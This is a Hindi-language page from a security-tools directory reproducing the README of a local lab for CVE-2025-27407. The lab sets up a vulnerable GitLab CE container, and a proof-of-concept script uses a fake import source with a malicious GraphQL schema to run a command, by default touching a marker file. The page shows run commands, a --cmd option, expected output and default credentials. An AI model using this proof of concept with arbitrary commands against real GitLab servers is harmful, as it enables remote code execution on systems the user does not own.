Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-27407 | Kitploit
उपकरण/GitHubGitHub/logggg2402/cve-2025-27407
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHublogggg2402/cve-2025-27407

CVE-2025-27407

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-27407 GitLab Podman लैब

GitLab Direct Transfer HTTP पथ कमज़ोर graphql-ruby introspection स्कीमा लोडर तक पहुँचता है, इसे साबित करने के लिए यह एक न्यूनतम केवल-स्थानीय लैब है। यह लैब एक कमज़ोर GitLab CE कंटेनर चलाती है; PoC स्क्रिप्ट परीक्षण के दौरान केवल प्रक्रिया-में (in-process) अपना नकली GitLab स्रोत सर्वर शुरू करती है।

इसे केवल उन सिस्टम्स पर चलाएँ जिनके स्वामी आप हैं या जिन पर परीक्षण करने के लिए आपको स्पष्ट रूप से अधिकृत किया गया है।

फ़ाइलें

फ़ाइलउद्देश्य
lab.shGitLab लैब को शुरू करता है, प्रतीक्षा करता है, सत्यापित करता है और साफ़ करता है।
poc_host_port_cmd.pyएकल-शॉट PoC: नकली स्रोत सर्वर + GitLab लॉगिन/कॉन्फ़िगर/इम्पोर्ट ट्रिगर।

आवश्यकताएँ

  • podman के साथ Linux होस्ट
  • curl
  • GitLab और PoC नकली स्रोत सर्वर के लिए खाली स्थानीय पोर्ट
  • GitLab Omnibus कंटेनर के लिए पर्याप्त RAM/डिस्क

डिफ़ॉल्ट मान:

लैब शुरू करें

पोर्ट 8080 स्क्रिप्ट का डिफ़ॉल्ट है। यदि इसे पहले से कोई और उपयोग कर रहा है, तो यहाँ दिखाए अनुसार 18080 उपयोग करें।

root@kitploit:~
cd gitlab-lab
chmod +x lab.sh poc_host_port_cmd.py

GITLAB_HTTP_PORT=18080 GITLAB_SSH_PORT=2225 ./lab.sh up

GitLab को यहाँ खोलें:

root@kitploit:~
http://127.0.0.1:18080

लॉगिन क्रेडेंशियल:

root@kitploit:~
root / Cve27407Password!

root केवल डिफ़ॉल्ट लैब उपयोगकर्ता है। PoC ट्रिगर के लिए एडमिन खाते की आवश्यकता नहीं है; कोई भी प्रमाणित उपयोगकर्ता जो किसी डेस्टिनेशन नेमस्पेस में बना/इम्पोर्ट कर सकता है, कमज़ोर Direct Transfer पथ को हिट कर सकता है। गैर-एडमिन उपयोगकर्ता के साथ परीक्षण करने के लिए --username और --password उपयोग करें।

PoC चलाएँ

root@kitploit:~
MARKER=/tmp/cve_2025_27407_gitlab_marker
podman exec cve-27407-gitlab rm -f "$MARKER"

./poc_host_port_cmd.py \
  --host 127.0.0.1 \
  --port 18080 \
  --listen-port 8001 \
  --wait-seconds 120 \
  --cmd "touch $MARKER"

MARKER="$MARKER" ./lab.sh verify

अपेक्षित संकेत:

root@kitploit:~
[*] create/import trigger status=200 final_url=http://127.0.0.1:18080/import/bulk_imports
[{"success":true,...}]
[evil-source] POST /api/graphql introspection -> malicious schema; command='touch ...'
[+] GitLab reached /api/graphql introspection over HTTP
[+] vulnerable: marker file exists inside GitLab container

विकल्प

पर्यावरण ओवरराइड्स

समस्या निवारण

  • यदि 8080 व्यस्त है, तो ./lab.sh up के लिए GITLAB_HTTP_PORT=18080 उपयोग करें।
  • यदि PoC अपने स्रोत पोर्ट को बाइंड नहीं कर पाता है, तो --listen-port को किसी अप्रयुक्त पोर्ट में बदलें।
  • यदि मार्कर सत्यापन बैकग्राउंड इम्पोर्ट वर्कर के साथ प्रतिस्पर्धा करता है, तो --wait-seconds बढ़ाएँ या MARKER="$MARKER" ./lab.sh verify फिर से चलाएँ।
  • यदि GitLab अभी तैयार नहीं है, तो GITLAB_HTTP_PORT=18080 ./lab.sh wait फिर से चलाएँ।
  • यदि कोई पिछली लैब अटक गई है, तो ./lab.sh cleanup चलाएँ और फिर से शुरू करें।

सफ़ाई

root@kitploit:~
./lab.sh cleanup

यह GitLab कंटेनर, पुराने लैब संस्करणों के किसी भी लीगेसी नकली-स्रोत कंटेनर और लैब नेटवर्क को हटा देता है। यह डाउनलोड की गई Podman इमेजेस को नहीं हटाता है।

टूल डाउनलोड करें
आइटमडिफ़ॉल्ट
GitLab इमेजdocker.io/gitlab/gitlab-ce:16.11.8-ce.0
GitLab कंटेनरcve-27407-gitlab
Podman नेटवर्कcve-2025-27407-net
GitLab रूट उपयोगकर्ताroot
GitLab रूट पासवर्डCve27407Password!
मार्कर/tmp/cve_2025_27407_gitlab_marker
विकल्पउद्देश्यडिफ़ॉल्ट
--hostलक्षित GitLab होस्टआवश्यक
--portलक्षित GitLab HTTP पोर्टआवश्यक
--cmdGitLab रनटाइम में निष्पादित कमांडtouch /tmp/cve_2025_27407_gitlab_marker
--listen-portस्थानीय नकली स्रोत सर्वर पोर्ट8001
--wait-secondsएसिंक्रोनस GitLab वर्कर्स के लिए नकली स्रोत को जीवित रखने का समय90
--usernameGitLab उपयोगकर्ता नामroot
--passwordGitLab पासवर्डCve27407Password!
वेरिएबलउद्देश्यडिफ़ॉल्ट
GITLAB_HTTP_PORTहोस्ट/कंटेनर GitLab HTTP पोर्ट8080
GITLAB_SSH_PORTहोस्ट GitLab SSH पोर्ट2224
GITLAB_ROOT_PASSWORDप्रारंभिक रूट पासवर्डCve27407Password!
GITLAB_IMAGEचलाने के लिए GitLab इमेजdocker.io/gitlab/gitlab-ce:16.11.8-ce.0
NETWORKPodman नेटवर्क नामcve-2025-27407-net
MARKERGitLab कंटेनर के अंदर जाँची जाने वाली फ़ाइल/tmp/cve_2025_27407_gitlab_marker
TIMEOUT_SECONDSरेडिनेस प्रतीक्षा समय सीमा1200